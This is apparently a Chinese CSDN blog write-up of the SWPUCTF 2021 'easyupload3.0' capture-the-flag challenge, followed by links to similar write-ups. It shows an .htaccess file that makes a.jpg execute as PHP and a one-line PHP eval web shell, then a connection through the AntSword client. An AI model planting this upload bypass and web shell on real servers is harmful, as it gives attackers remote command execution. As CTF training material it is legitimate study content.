[SWPUCTF 2021 新生赛]easyupload3.0

最新推荐文章于 2024-09-05 21:48:58 发布
最新推荐文章于 2024-09-05 21:48:58 发布
阅读量746 收藏 10
点赞数 8
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80059204/article/details/135083215
版权
本文介绍了在SWPUCTF2021比赛中,通过easyupload3.0漏洞,上传黑名单文件和一句话木马实现文件重定向和创建Webshell的方法,强调了hataccess文件的作用和PHP编码规则的应用。
摘要由CSDN通过智能技术生成

[SWPUCTF 2021 新生赛]easyupload3.0

让我们上传一个文件(注意打开环境之后会有一个提示,试试和某些文件配合呢)

我就直接跳过测试阶段,解法就是先上传一个黑名单文件,再一次返回上传文件页面,继续上传一句话木马文件,即可。

hataccess文件,简单说就是可以通过这个文件,可以帮我们实现网页页面重定向,改变文件名,目录的访问等。而对于hataccess文件的内容,只要符合php编码规则即可

开始编写.hataccess文件

<FilesMatch "a.jpg"> //""中是我们要上传的文件名
SetHandler application/x-httpd-php
</FilesMatch>

注意:上传的黑名单文件格式“文件名+.hataccess”

上传的一句话木马

<?php @eval($_POST['cmd']);?>

最后使用蚁剑连接找目录即可

Lnre
关注
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 729
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
web学习记录
qq_60530516的博客
11-30 963
web学习笔记
easyUpload.js图片(视频)上传控件
07-04
一个上传图片(视频)的JS Demo,可以自定义上传图片,也可以改为视频资源上传的控件。个人感觉挺好用的
【CTF】[SWPUCTF 2021 新生]easyupload3.0
西原一点红的博客
06-20 407
响应说明是黑名单校验尝试后缀绕过,发现行不通htaccessphpinfo里找到flag。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 3017
此处主要在NSSCTF平台()上开展刷题。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1102
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1562
。。
[SWPUCTF 2021 新生]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装
最新发布
符啸九天的博客
09-05 396
[SWPUCTF 2021 新生]crypto6 [SWPUCTF 2021 新生]crypto7 [SWPUCTF 2021 新生]crypto8 [SWPUCTF 2021 新生]ez_caesar解题思路
[SWPUCTF 2021]easyupload3.0(WP)
wikey 的博客
03-28 260
第一行是自动查找文件并解析为php。然后打开burp抓住图片上传的数据。修改数据之后写木马并传进去。看起来跟前两次差不多捏。然后复制文件夹去蚁剑链接。老样子burp弄一下。
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1447
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
攻防世界ctf题目easyupload做题笔记。
qq_56426046的博客
08-27 4550
攻防世界ctf题目easyupload做题笔记。
[SWPUCTF 2021 新生] web
qq_61768489的博客
08-07 3999
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
ctf练习之Easy upload
SDM_JH的博客
08-07 2718
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 762
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
合天每周CTF之第五周-Easy upload
xxhjtc的博客
12-13 862
1.题目描述: 1).进入环境,查看页面源代码,发现限制文件格式为png,jpg,gif: 2).创建文本文档,修改格式为1.png,上传,提示图片格式不对: 3)寻找实验环境内其他图片,重新上传: 4).得到提示信息,可以得知是进行文件头检测,打开burpsuite抓包,将文件名修改为give_me_flag.php: 修改前: 修改后: 5).得到提示信息,文件内需要包含:givemeflag,将该字符串粘贴至文件内任意位置,提交得到flag: 6)fla..
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值